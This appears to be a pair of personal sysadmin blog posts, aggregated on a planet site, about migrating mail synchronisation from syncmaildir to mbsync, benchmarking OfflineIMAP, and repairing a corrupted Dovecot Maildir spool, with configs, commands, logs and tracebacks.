An improvement over polling repeatedly with a .timer would be to wake up only on IMAP notify, but neither imapnotify nor goimapnotify seem to be packaged in Debian. It would also not cover for the "sent folder" use case, where we need to wake up on local changes.

Password-less setup

The sample file suggests this should work:

IMAPStore remote Tunnel "ssh -q host.remote.com /usr/sbin/imapd"

Add BatchMode, restrict to IdentitiesOnly, provide a password-less key just for this, add compression (-C), find the Dovecot imap binary, and you get this:

IMAPAccount anarcat-tunnel Tunnel "ssh -o BatchMode=yes -o IdentitiesOnly=yes -i ~/.ssh/id_ed25519_mbsync -o HostKeyAlias=shell.anarc.at -C anarcat@imap.anarc.at /usr/lib/dovecot/imap"

And it actually seems to work:

$ mbsync -a Notice: Master/Slave are deprecated; use Far/Near instead. C: 0/2 B: 0/1 F: +0/0 *0/0 #0/0 N: +0/0 *0/0 #0/0imap(anarcat): Error: net_connect_unix(/run/dovecot/stats-writer) failed: Permission denied C: 2/2 B: 205/205 F: +0/0 *0/0 #0/0 N: +1/1 *3/3 #0/0imap(anarcat)<1611280><90uUOuyElmEQlhgAFjQyWQ>: Info: Logged out in=10808 out=15396642 deleted=0 expunged=0 trashed=0 hdr_count=0 hdr_bytes=0 body_count=1 body_bytes=8087

It's a bit noisy, however. dovecot/imap doesn't have a "usage" to speak of, but even the source code doesn't hint at a way to disable that Error message, so that's unfortunate. That socket is owned by root:dovecot so presumably Dovecot runs the imap process as $user:dovecot, which we can't do here. Oh well?

Interestingly, the SSH setup is not faster than IMAP.

With IMAP:

===> multitime results 1: mbsync -a Mean Std.Dev. Min Median Max real 2.367 0.065 2.220 2.376 2.458 user 0.793 0.047 0.731 0.776 0.871 sys 0.426 0.040 0.364 0.434 0.476

With SSH:

===> multitime results 1: mbsync -a Mean Std.Dev. Min Median Max real 2.515 0.088 2.274 2.532 2.594 user 0.753 0.043 0.645 0.766 0.804 sys 0.328 0.045 0.212 0.340 0.393

Basically: 200ms slower. Tolerable.

Migrating from SMD

The above was how I migrated to mbsync on my first workstation. The work on the second one was more streamlined, especially since the corruption on mailboxes was fixed:

  1. install isync, with the patch:

    dpkg -i isync_1.4.3-1.1~_amd64.deb
  2. copy all files over from previous workstation to avoid a full resync (optional):

    rsync -a --info=progress2 angela:Maildir/ Maildir-mbsync/
  3. rename all files to match new hostname (optional):

    find Maildir-mbsync/ -type f -name '*.angela,*' -print0 | rename -0 's/\.angela,/\.curie,/'
  4. trash the notmuch database (optional):

    rm -rf Maildir-mbsync/.notmuch/xapian/
  5. disable all smd and notmuch services:

    systemctl --user --now disable smd-pull.service smd-pull.timer smd-push.service smd-push.timer notmuch-new.service notmuch-new.timer
  6. do one last sync with smd:

    smd-pull --show-tags ; smd-push --show-tags ; notmuch new ; notmuch-sync-flagged -v
  7. backup notmuch on the client and server:

    notmuch dump | pv > notmuch.dump
  8. backup the maildir on the client and server:

    cp -al Maildir Maildir-bak
  9. create the SSH key:

    ssh-keygen -t ed25519 -f .ssh/id_ed25519_mbsync cat .ssh/id_ed25519_mbsync.pub
  10. add to .ssh/authorized_keys on the server, like this:

    command="/usr/lib/dovecot/imap",restrict ssh-ed25519 AAAAC...

  11. move old files aside, if present:

    mv Maildir Maildir-smd
  12. move new files in place (CRITICAL SECTION BEGINS!):

    mv Maildir-mbsync Maildir
  13. run a test sync, only pulling changes:

    mbsync --create-near --remove-none --expunge-none --noop anarcat-register

  14. if that works well, try with all mailboxes:

    mbsync --create-near --remove-none --expunge-none --noop -a

  15. if that works well, try again with a full sync:

    mbsync register mbsync -a

  16. reindex and restore the notmuch database, this should take ~25 minutes:

    notmuch new pv notmuch.dump | notmuch restore
  17. enable the systemd services and retire the smd-* services:

    systemctl --user enable mbsync.timer notmuch-new.service systemctl --user start mbsync.timer rm ~/.config/systemd/user/smd* systemctl daemon-reload

During the migration, notmuch helpfully told me the full list of those lost messages:

[...] Warning: cannot apply tags to missing message: CAN6gO7_QgCaiDFvpG3AXHi6fW12qaN286+2a7ERQ2CQtzjSEPw@mail.gmail.com Warning: cannot apply tags to missing message: CAPTU9Wmp0yAmaxO+qo8CegzRQZhCP853TWQ_Ne-YF94MDUZ+Dw@mail.gmail.com Warning: cannot apply tags to missing message: F5086003-2917-4659-B7D2-66C62FCD4128@gmail.com [...] Warning: cannot apply tags to missing message: mailman.2.1316793601.53477.sage-members@mailman.sage.org Warning: cannot apply tags to missing message: mailman.7.1317646801.26891.outages-discussion@outages.org Warning: cannot apply tags to missing message: notmuch-sha1-000458df6e48d4857187a000d643ac971deeef47 Warning: cannot apply tags to missing message: notmuch-sha1-0079d8e0c3340e6f88c66f4c49fca758ea71d06d Warning: cannot apply tags to missing message: notmuch-sha1-0194baa4cfb6d39bc9e4d8c049adaccaa777467d Warning: cannot apply tags to missing message: notmuch-sha1-02aede494fc3f9e9f060cfd7c044d6d724ad287c Warning: cannot apply tags to missing message: notmuch-sha1-06606c625d3b3445420e737afd9a245ae66e5562 Warning: cannot apply tags to missing message: notmuch-sha1-0747b020f7551415b9bf5059c58e0a637ba53b13 [...]

As detailed in the crash report, all of those were actually innocuous and could be ignored.

Also note that we completely trash the notmuch database because it's actually faster to reindex from scratch than let notmuch slowly figure out that all mails are new and all the old mails are gone. The fresh indexing took:

nov 19 15:08:54 angela notmuch[2521117]: Processed 384679 total files in 23m 41s (270 files/sec.). nov 19 15:08:54 angela notmuch[2521117]: Added 372610 new messages to the database.

While a reindexing on top of an existing database was going twice as slow, at about 120 files/sec.

Current config file

Putting it all together, I ended up with the following configuration file:

SyncState * Sync All # IMAP side, AKA "Far" IMAPAccount anarcat-imap Host imap.anarc.at User anarcat PassCmd "pass imap.anarc.at" SSLType IMAPS CertificateFile /etc/ssl/certs/ca-certificates.crt IMAPAccount anarcat-tunnel Tunnel "ssh -o BatchMode=yes -o IdentitiesOnly=yes -i ~/.ssh/id_ed25519_mbsync -o HostKeyAlias=shell.anarc.at -C anarcat@imap.anarc.at /usr/lib/dovecot/imap" IMAPStore anarcat-remote Account anarcat-tunnel # Maildir side, AKA "Near" MaildirStore anarcat-local # Maildir/top/sub/sub #SubFolders Verbatim # Maildir/.top.sub.sub SubFolders Maildir++ # Maildir/top/.sub/.sub # SubFolders legacy # The trailing "/" is important #Path ~/Maildir-mbsync/ Inbox ~/Maildir/ # what binds Maildir and IMAP Channel anarcat Far :anarcat-remote: Near :anarcat-local: # Exclude everything under the internal [Gmail] folder, except the interesting folders #Patterns * ![Gmail]* "[Gmail]/Sent Mail" "[Gmail]/Starred" "[Gmail]/All Mail" # Or include everything #Patterns * Patterns * !register !.register # Automatically create missing mailboxes, both locally and on the server Create Both #Create Near # Sync the movement of messages between folders and deletions, add after making sure the sync works Expunge Both # Propagate mailbox deletion Remove both IMAPAccount anarcat-register-imap Host imap.anarc.at User register PassCmd "pass imap.anarc.at-register" SSLType IMAPS CertificateFile /etc/ssl/certs/ca-certificates.crt IMAPAccount anarcat-register-tunnel Tunnel "ssh -o BatchMode=yes -o IdentitiesOnly=yes -i ~/.ssh/id_ed25519_mbsync -o HostKeyAlias=shell.anarc.at -C register@imap.anarc.at /usr/lib/dovecot/imap" IMAPStore anarcat-register-remote Account anarcat-register-tunnel MaildirStore anarcat-register-local SubFolders Maildir++ Inbox ~/Maildir/.register/ Channel anarcat-register Far :anarcat-register-remote: Near :anarcat-register-local: Create Both Expunge Both Remove both

Note that it may be out of sync with my live (and private) configuration file, as I do not publish my "dotfiles" repository publicly for security reasons.

OfflineIMAP

I've used OfflineIMAP for a long time before switching to SMD. I don't exactly remember why or when I started using it, but I do remember it became painfully slow as I started using notmuch, and would sometimes crash mysteriously. It's been a while, so my memory is hazy on that.

It also kind of died in a fire when Python 2 stop being maintained. The main author moved on to a different project, imapfw which could serve as a framework to build IMAP clients, but never seemed to implement all of the OfflineIMAP features and certainly not configuration file compatibility. Thankfully, a new team of volunteers ported OfflineIMAP to Python 3 and we can now test that new version to see if it is an improvement over mbsync.

Crash on full sync

The first thing that happened on a full sync is this crash:

Copy message from RemoteAnarcat:junk: ERROR: Copying message 30624 [acc: Anarcat] decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode') Thread 'Copy message from RemoteAnarcat:junk' terminated with exception: Traceback (most recent call last): File "/usr/share/offlineimap3/offlineimap/imaputil.py", line 406, in utf7m_decode for c in binary.decode(): AttributeError: 'memoryview' object has no attribute 'decode' The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/usr/share/offlineimap3/offlineimap/threadutil.py", line 146, in run Thread.run(self) File "/usr/lib/python3.9/threading.py", line 892, in run self._target(*self._args, **self._kwargs) File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 802, in copymessageto message = self.getmessage(uid) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 342, in getmessage data = self._fetch_from_imap(str(uid), self.retrycount) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 908, in _fetch_from_imap ndata1 = self.parser['8bit-RFC'].parsebytes(data[0][1]) File "/usr/lib/python3.9/email/parser.py", line 123, in parsebytes return self.parser.parsestr(text, headersonly) File "/usr/lib/python3.9/email/parser.py", line 67, in parsestr return self.parse(StringIO(text), headersonly=headersonly) File "/usr/lib/python3.9/email/parser.py", line 56, in parse feedparser.feed(data) File "/usr/lib/python3.9/email/feedparser.py", line 176, in feed self._call_parse() File "/usr/lib/python3.9/email/feedparser.py", line 180, in _call_parse self._parse() File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen for retval in self._parsegen(): File "/usr/lib/python3.9/email/feedparser.py", line 298, in _parsegen for retval in self._parsegen(): File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen for retval in self._parsegen(): File "/usr/lib/python3.9/email/feedparser.py", line 256, in _parsegen if self._cur.get_content_type() == 'message/delivery-status': File "/usr/lib/python3.9/email/message.py", line 578, in get_content_type value = self.get('content-type', missing) File "/usr/lib/python3.9/email/message.py", line 471, in get return self.policy.header_fetch_parse(k, v) File "/usr/lib/python3.9/email/policy.py", line 163, in header_fetch_parse return self.header_factory(name, value) File "/usr/lib/python3.9/email/headerregistry.py", line 601, in __call__ return self[name](name, value) File "/usr/lib/python3.9/email/headerregistry.py", line 196, in __new__ cls.parse(value, kwds) File "/usr/lib/python3.9/email/headerregistry.py", line 445, in parse kwds['parse_tree'] = parse_tree = cls.value_parser(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 2675, in parse_content_type_header ctype.append(parse_mime_parameters(value[1:])) File "/usr/lib/python3.9/email/_header_value_parser.py", line 2569, in parse_mime_parameters token, value = get_parameter(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 2492, in get_parameter token, value = get_value(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 2403, in get_value token, value = get_quoted_string(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 1294, in get_quoted_string token, value = get_bare_quoted_string(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 1223, in get_bare_quoted_string token, value = get_encoded_word(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 1064, in get_encoded_word text, charset, lang, defects = _ew.decode('=?' + tok + '?=') File "/usr/lib/python3.9/email/_encoded_words.py", line 181, in decode string = bstring.decode(charset) AttributeError: decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode') Last 1 debug messages logged for Copy message from RemoteAnarcat:junk prior to exception: thread: Register new thread 'Copy message from RemoteAnarcat:junk' (account 'Anarcat') ERROR: Exceptions occurred during the run! ERROR: Copying message 30624 [acc: Anarcat] decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode') Traceback: File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 802, in copymessageto message = self.getmessage(uid) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 342, in getmessage data = self._fetch_from_imap(str(uid), self.retrycount) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 908, in _fetch_from_imap ndata1 = self.parser['8bit-RFC'].parsebytes(data[0][1]) File "/usr/lib/python3.9/email/parser.py", line 123, in parsebytes return self.parser.parsestr(text, headersonly) File "/usr/lib/python3.9/email/parser.py", line 67, in parsestr return self.parse(StringIO(text), headersonly=headersonly) File "/usr/lib/python3.9/email/parser.py", line 56, in parse feedparser.feed(data) File "/usr/lib/python3.9/email/feedparser.py", line 176, in feed self._call_parse() File "/usr/lib/python3.9/email/feedparser.py", line 180, in _call_parse self._parse() File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen for retval in self._parsegen(): File "/usr/lib/python3.9/email/feedparser.py", line 298, in _parsegen for retval in self._parsegen(): File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen for retval in self._parsegen(): File "/usr/lib/python3.9/email/feedparser.py", line 256, in _parsegen if self._cur.get_content_type() == 'message/delivery-status': File "/usr/lib/python3.9/email/message.py", line 578, in get_content_type value = self.get('content-type', missing) File "/usr/lib/python3.9/email/message.py", line 471, in get return self.policy.header_fetch_parse(k, v) File "/usr/lib/python3.9/email/policy.py", line 163, in header_fetch_parse return self.header_factory(name, value) File "/usr/lib/python3.9/email/headerregistry.py", line 601, in __call__ return self[name](name, value) File "/usr/lib/python3.9/email/headerregistry.py", line 196, in __new__ cls.parse(value, kwds) File "/usr/lib/python3.9/email/headerregistry.py", line 445, in parse kwds['parse_tree'] = parse_tree = cls.value_parser(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 2675, in parse_content_type_header ctype.append(parse_mime_parameters(value[1:])) File "/usr/lib/python3.9/email/_header_value_parser.py", line 2569, in parse_mime_parameters token, value = get_parameter(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 2492, in get_parameter token, value = get_value(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 2403, in get_value token, value = get_quoted_string(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 1294, in get_quoted_string token, value = get_bare_quoted_string(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 1223, in get_bare_quoted_string token, value = get_encoded_word(value) File "/usr/lib/python3.9/email/_header_value_parser.py", line 1064, in get_encoded_word text, charset, lang, defects = _ew.decode('=?' + tok + '?=') File "/usr/lib/python3.9/email/_encoded_words.py", line 181, in decode string = bstring.decode(charset) Folder junk [acc: Anarcat]: Copy message UID 30626 (29008/49310) RemoteAnarcat:junk -> LocalAnarcat:junk Command exited with non-zero status 100 5252.91user 535.86system 3:21:00elapsed 47%CPU (0avgtext+0avgdata 846304maxresident)k 96344inputs+26563792outputs (1189major+2155815minor)pagefaults 0swaps

That only transferred about 8GB of mail, which gives us a transfer rate of 5.3Mbit/s, more than 5 times slower than mbsync. This bug is possibly limited to the bullseye version of offlineimap3 (the lovely 0.0~git20210225.1e7ef9e+dfsg-4), while the current sid version (the equally gorgeous 0.0~git20211018.e64c254+dfsg-1) seems unaffected.

Tolerable performance

The new release still crashes, except it does so at the very end, which is an improvement, since the mails do get transferred:

*** Finished account 'Anarcat' in 511:12 ERROR: Exceptions occurred during the run! ERROR: Exception parsing message with ID (<20190619152034.BFB8810E07A@marcos.anarc.at>) from imaplib (response type: bytes). AttributeError: decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode') Traceback: File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 810, in copymessageto message = self.getmessage(uid) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 343, in getmessage data = self._fetch_from_imap(str(uid), self.retrycount) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 910, in _fetch_from_imap raise OfflineImapError( ERROR: Exception parsing message with ID (<40A270DB.9090609@alternatives.ca>) from imaplib (response type: bytes). AttributeError: decoding with 'x-mac-roman' codec failed (AttributeError: 'memoryview' object has no attribute 'decode') Traceback: File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 810, in copymessageto message = self.getmessage(uid) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 343, in getmessage data = self._fetch_from_imap(str(uid), self.retrycount) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 910, in _fetch_from_imap raise OfflineImapError( ERROR: IMAP server 'RemoteAnarcat' does not have a message with UID '32686' Traceback: File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 810, in copymessageto message = self.getmessage(uid) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 343, in getmessage data = self._fetch_from_imap(str(uid), self.retrycount) File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 889, in _fetch_from_imap raise OfflineImapError(reason, severity) Command exited with non-zero status 1 8273.52user 983.80system 8:31:12elapsed 30%CPU (0avgtext+0avgdata 841936maxresident)k 56376inputs+43247608outputs (811major+4972914minor)pagefaults 0swaps "offlineimap -o " took 8 hours 31 mins 15 secs

This is 8h31m for transferring 12G, which is around 3.1Mbit/s. That is nine times slower than mbsync, almost an order of magnitude!

Now that we have a full sync, we can test incremental synchronization. That is also much slower:

===> multitime results 1: sh -c "offlineimap -o || true" Mean Std.Dev. Min Median Max real 24.639 0.513 23.946 24.526 25.708 user 23.912 0.473 23.404 23.795 24.947 sys 1.743 0.105 1.607 1.729 2.002

That is also an order of magnitude slower than mbsync, and significantly slower than what you'd expect from a sync process. ~30 seconds is long enough to make me impatient and distracted; 3 seconds, less so: I can wait and see the results almost immediately.

Integrity check

That said: this is still on a gigabit link. It's technically possible that OfflineIMAP performs better than mbsync over a slow link, but I Haven't tested that theory.

The OfflineIMAP mail spool is missing quite a few messages as well:

anarcat@angela:~(main)$ find Maildir-offlineimap -type f -type f -a \! -name '.*' | wc -l 381463 anarcat@angela:~(main)$ find Maildir -type f -type f -a \! -name '.*' | wc -l 385247

... although that's probably all either new messages or the register folder, so OfflineIMAP might actually be in a better position there. But digging in more, it seems like the actual per-folder diff is fairly similar to mbsync: a few messages missing here and there. Considering OfflineIMAP's instability and poor performance, I have not looked any deeper in those discrepancies.

Other projects to evaluate

Those are all the options I have considered, in alphabetical order

  • doveadm-sync: requires dovecot on both ends, can tunnel over SSH, may have performance issues in incremental sync
  • fdm: fetchmail replacement, IMAP/POP3/stdin/Maildir/mbox,NNTP support, SOCKS support (for Tor), complex rules for delivering to specific mailboxes, adding headers, piping to commands, etc. discarded because no (real) support for keeping mail on the server, and written in C
  • getmail: fetchmail replacement, IMAP/POP3 support, supports incremental runs, classification rules, Python
  • interimap: syncs two IMAP servers, apparently faster than doveadm and offlineimap, but requires running an IMAP server locally
  • isync/mbsync: TLS client certs and SSH tunnels, fast, incremental, IMAP/POP/Maildir support, multiple mailbox, trash and recursion support, and generally has good words from multiple Debian and notmuch people (Arch tutorial), written in C, review above
  • mail-sync: notify support, happens over any piped transport (e.g. ssh), diff/patch system, requires binary on both ends, mentions UUCP in the manpage, mentions rsmtp which is a nice name for rsendmail. not evaluated because it seems awfully complex to setup
  • nncp: treat the local spool as another mail server, not really compatible with my "multiple clients" setup
  • offlineimap3: requires IMAP, used the py2 version in the past, might just still work, first sync painful (IIRC), ways to tunnel over SSH, review above

Most projects were not evaluated due to lack of time.

Conclusion

I'm now using mbsync to sync my mail. I'm a little disappointed by the synchronisation times over the slow link, but I guess that's on par for the course if we use IMAP. We are bound by the network speed much more than with custom protocols. I'm also worried about the C implementation and the crashes I have witnessed, but I am encouraged by the fast upstream response.

Time will tell if I will stick with that setup. I'm certainly curious about the promises of interimap and mail-sync, but I have ran out of time on this project.

Categories: FLOSS Project Planets

Anarcat: The last syncmaildir crash

Planet Python - Sun, 2021-11-21 11:04

My syncmaildir (SMD) setup failed me one too many times (previously, previously). In an attempt to migrate to an alternative mail synchronization tool, I looked into using my IMAP server again, and found out my mail spool was in a pretty bad shape. I'm comparing mbsync and offlineimap in the next post but this post talks about how I recovered the mail spool so that tools like those could correctly synchronise the mail spool again.

The latest crash

On Monday, SMD just started failing with this error:

nov 15 16:12:19 angela systemd[2305]: Starting pull emails with syncmaildir... nov 15 16:12:22 angela systemd[2305]: smd-pull.service: Succeeded. nov 15 16:12:22 angela systemd[2305]: Finished pull emails with syncmaildir. nov 15 16:14:08 angela systemd[2305]: Starting pull emails with syncmaildir... nov 15 16:14:11 angela systemd[2305]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE nov 15 16:14:11 angela systemd[2305]: smd-pull.service: Failed with result 'exit-code'. nov 15 16:14:11 angela systemd[2305]: Failed to start pull emails with syncmaildir. nov 15 16:16:14 angela systemd[2305]: Starting pull emails with syncmaildir... nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Network error. nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Unable to get any data from the other endpoint. nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: This problem may be transient, please retry. nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Hint: did you correctly setup the SERVERNAME variable nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: on your client? Did you add an entry for it in your ssh nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: configuration file? nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Network error nov 15 16:16:17 angela smd-pull[27188]: register: smd-client@localhost: TAGS: error::context(handshake) probable-cause(network) human-intervention(avoidable) suggested-actions(retry) nov 15 16:16:17 angela systemd[2305]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE nov 15 16:16:17 angela systemd[2305]: smd-pull.service: Failed with result 'exit-code'. nov 15 16:16:17 angela systemd[2305]: Failed to start pull emails with syncmaildir.

What is frustrating is that there's actually no network error here. Running the command by hand I did see a different message, but now I have lost it in my backlog. It had something to do with a filename being too long, and I gave up debugging after a while. This happened suddenly too, which added to the confusion.

In a fit of rage I started this blog post and experimenting with alternatives, which led me down a lot of rabbit holes.

Reviewing my previous mail crash documentation, it seems most solutions involve talking to an IMAP server, so I figured I would just do that. Wanting to try something new, i gave isync (AKA mbsync) a try. Oh dear, I did not expect how much trouble just talking to my IMAP server would be, which wasn't not isync's fault, for what that's worth. It was the primary tool I used to debug things, and served me well in that regard.

Mailbox corruption

The first thing I found out is that certain messages in the IMAP spool were corrupted. mbsync would stop on a FETCH command and Dovecot would give me those errors on the server side.

"wrong W value" nov 16 15:31:27 marcos dovecot[3621800]: imap(anarcat)<3630489><wAmSzO3QZtfAqAB1>: Error: Mailbox junk: Maildir filename has wrong W value, renamed the file from /home/anarcat/Maildir/.junk/cur/1454623938.M101164P22216.marcos,S=2495,W=2578:2,S to /home/anarcat/Maildir/.junk/cur/1454623938.M101164P22216.marcos,S=2495:2,S nov 16 15:31:27 marcos dovecot[3621800]: imap(anarcat)<3630489><wAmSzO3QZtfAqAB1>: Error: Mailbox junk: Deleting corrupted cache record uid=1582: UID 1582: Broken virtual size in mailbox junk: read(/home/anarcat/Maildir/.junk/cur/1454623938.M101164P22216.marcos,S=2495,W=2578:2,S): FETCH BODY[] got too little data: 2540 vs 2578

At least this first error was automatically healed by Dovecot (by renaming the file without the W= flag). The problem is that the FETCH command fails and mbsync exits noisily. So you need to constantly restart mbsync with a silly command like:

while ! mbsync -a; do sleep 1; done "cached message size larger than expected" nov 16 13:53:08 marcos dovecot[3520770]: imap(anarcat)<3594402><M5JHb+zQ3NLAqAB1>: Error: Mailbox Sent: UID=19288: read(/home/anarcat/Maildir/.Sent/cur/1224790447.M898726P9811V000000000000FE06I00794FB1_0.marvin,S=2588:2,S) failed: Cached message size larger than expected (2588 > 2482, box=Sent, UID=19288) (read reason=mail stream) nov 16 13:53:08 marcos dovecot[3520770]: imap(anarcat)<3594402><M5JHb+zQ3NLAqAB1>: Error: Mailbox Sent: Deleting corrupted cache record uid=19288: UID 19288: Broken physical size in mailbox Sent: read(/home/anarcat/Maildir/.Sent/cur/1224790447.M898726P9811V000000000000FE06I00794FB1_0.marvin,S=2588:2,S) failed: Cached message size larger than expected (2588 > 2482, box=Sent, UID=19288) nov 16 13:53:08 marcos dovecot[3520770]: imap(anarcat)<3594402><M5JHb+zQ3NLAqAB1>: Error: Mailbox Sent: UID=19288: read(/home/anarcat/Maildir/.Sent/cur/1224790447.M898726P9811V000000000000FE06I00794FB1_0.marvin,S=2588:2,S) failed: Cached message size larger than expected (2588 > 2482, box=Sent, UID=19288) (read reason=) nov 16 13:53:08 marcos dovecot[3520770]: imap-login: Panic: epoll_ctl(del, 7) failed: Bad file descriptor

This second problem is much harder to fix, because dovecot does not recover automatically. This is Dovecot complaining that the cached size (the S= field, but also present in Dovecot's metadata files) doesn't match the file size.

I wonder if at least some of those messages were corrupted in the OfflineIMAP to syncmaildir migration because part of that procedure is to run the strip_header script to remove content from the emails. That could easily have broken things since the files do not also get renamed.

Workaround

So I read a lot of the Dovecot documentation on the maildir format, and wrote an extensive fix script for those two errors. The script worked and mbsync was able to sync the entire mail spool.

And no, rebuilding the index files didn't work. Also tried doveadm force-resync -u anarcat which didn't do anything.

In the end I also had to do this, because the wrong cache values were also stored elsewhere.

service dovecot stop ; find -name 'dovecot*' -delete; service dovecot start

This would have totally broken any existing clients, but thankfully I'm starting from scratch (except maybe webmail, but I'm hoping it will self-heal as well, assuming it only has a cache and not a full replica of the mail spool).

Incoherence between Maildir and IMAP

Unfortunately, the first mbsync was incomplete as it was missing about 15,000 mails:

anarcat@angela:~(main)$ find Maildir -type f -type f -a \! -name '.*' | wc -l 384836 anarcat@angela:~(main)$ find Maildir-mbsync/ -type f -a \! -name '.*' | wc -l 369221

As it turns out, mbsync was not at fault here either: this was yet more mail spool corruption.

It's actually 26 folders (out of 205) with inconsistent sizes, which can be found with:

for folder in * .[^.]* ; do printf "%s\t%d\n" $folder $(find "$folder" -type f -a \! -name '.*' | wc -l ); done

The special \! -name '.*' bit is to ignore the mbsync metadata, which creates .uidvalidity and .mbsyncstate in every folder. That ignores about 200 files but since they are spread around all folders, which was making it impossible to review where the problem was.

Here is what the diff looks like:

--- Maildir-list 2021-11-17 20:42:36.504246752 -0500 +++ Maildir-mbsync-list 2021-11-17 20:18:07.731806601 -0500 @@ -6,16 +6,15 @@ [...] .Archives 1 .Archives.2010 3553 -.Archives.2011 3583 -.Archives.2012 12593 +.Archives.2011 3582 +.Archives.2012 620 .Archives.2013 8576 .Archives.2014 11057 -.Archives.2015 8173 +.Archives.2015 8165 .Archives.2016 54 .band 34 .bitbuck 1 @@ -38,13 +37,12 @@ .couchsurfers 2 -cur 11285 +cur 11280 .current 130 .cv 2 .debbug 262 -.debian 37544 -drafts 1 -.Drafts 4 +.debian 37533 +.Drafts 2 .drone 241 .drupal 188 .drupal-devel 303 [...] Misfiled messages

It's a bit all over the place, but we can already notice some huge differences between mailboxes, for example in the Archives folders. As it turns out, at least 12,000 of those missing mails were actually misfiled: instead of being in the Maildir/.Archives.2012/cur/ folder, they were directly in Maildir/.Archives.2012/. This is something that doesn't matter for SMD (and possibly for notmuch? it does matter, notmuch suddenly found 12,000 new mails) but that definitely matters to Dovecot and therefore mbsync...

After moving those files around, we still have 4,000 message missing:

anarcat@angela:~(main)$ find Maildir-mbsync/ -type f -a \! -name '.*' | wc -l 381196 anarcat@angela:~(main)$ find Maildir/ -type f -a \! -name '.*' | wc -l 385053

The problem is that those 4,000 missing mails are harder to track. Take, for example, .Archives.2011, which has a single message missing, out of 3,582. And the files are not identical: the checksums don't match after going through the IMAP transport, so we can't use a tool like hashdeep to compare the trees and find why any single file is missing.

"register" folder

One big chunk of the 4,000, however, is a special folder called register in my spool, which I am syncing separately (see Securing registration email for details on that setup). That actually covers 3,700 of those messages, so I actually have a more modest 300 messages to figure out, after (easily!) configuring mbsync to sync that folder separately:

@@ -30,9 +33,29 @@ Slave :anarcat-local: # Exclude everything under the internal [Gmail] folder, except the interesting folders #Patterns * ![Gmail]* "[Gmail]/Sent Mail" "[Gmail]/Starred" "[Gmail]/All Mail" # Or include everything -Patterns * +#Patterns * +Patterns * !register !.register # Automatically create missing mailboxes, both locally and on the server #Create Both Create slave # Sync the movement of messages between folders and deletions, add after making sure the sync works #Expunge Both + +IMAPAccount anarcat-register +Host imap.anarc.at +User register +PassCmd "pass imap.anarc.at-register" +SSLType IMAPS +CertificateFile /etc/ssl/certs/ca-certificates.crt + +IMAPStore anarcat-register-remote +Account anarcat-register + +MaildirStore anarcat-register-local +SubFolders Maildir++ +Inbox ~/Maildir-mbsync/.register/ + +Channel anarcat-register +Master :anarcat-register-remote: +Slave :anarcat-register-local: +Create slave "tmp" folders and empty messages

After syncing the "register" messages, I end up with the measly little 160 emails out of sync:

anarcat@angela:~(main)$ find Maildir-mbsync/ -type f -a \! -name '.*' | wc -l 384900 anarcat@angela:~(main)$ find Maildir/ -type f -a \! -name '.*' | wc -l 385059

Argh. After more digging, I have found 131 mails in the tmp/ directories of the client's mail spool. Mysterious! On the server side, it's even more files, and not the same ones. Possible that those were mails that were left there during a failed delivery of some sort, during a power failure or some sort of crash? Who knows. It could be another race condition in SMD if it runs while mail is being delivered in tmp/...

The first thing to do with those is to cleanup a bunch of empty files (21 on angela):

find .[^.]*/tmp -type f -empty -delete

As it turns out, they are all duplicates, in the sense that notmuch can easily find a copy of files with the same message ID in its database. In other words, this hairy command returns nothing

find .[^.]*/tmp -type f | while read path; do msgid=$(grep -m 1 -i ^message-id "$path" | sed 's/Message-ID: //i;s/[<>]//g'); if notmuch count --exclude=false "id:$msgid" | grep -q 0; then echo "$path <$msgid> not in notmuch" ; fi; done

... which is good. Or, to put it another way, this is safe:

find .[^.]*/tmp -type f -delete

Poof! 314 mails cleaned on the server side. Interestingly, SMD doesn't pick up on those changes at all and still sees files in tmp/ directories on the client side, so we need to operate the same twisted logic there.

notmuch to the rescue again

After cleaning that on the client, we get:

anarcat@angela:~(main)$ find Maildir/ -type f -a \! -name '.*' | wc -l 384928 anarcat@angela:~(main)$ find Maildir-mbsync/ -type f -a \! -name '.*' | wc -l 384901

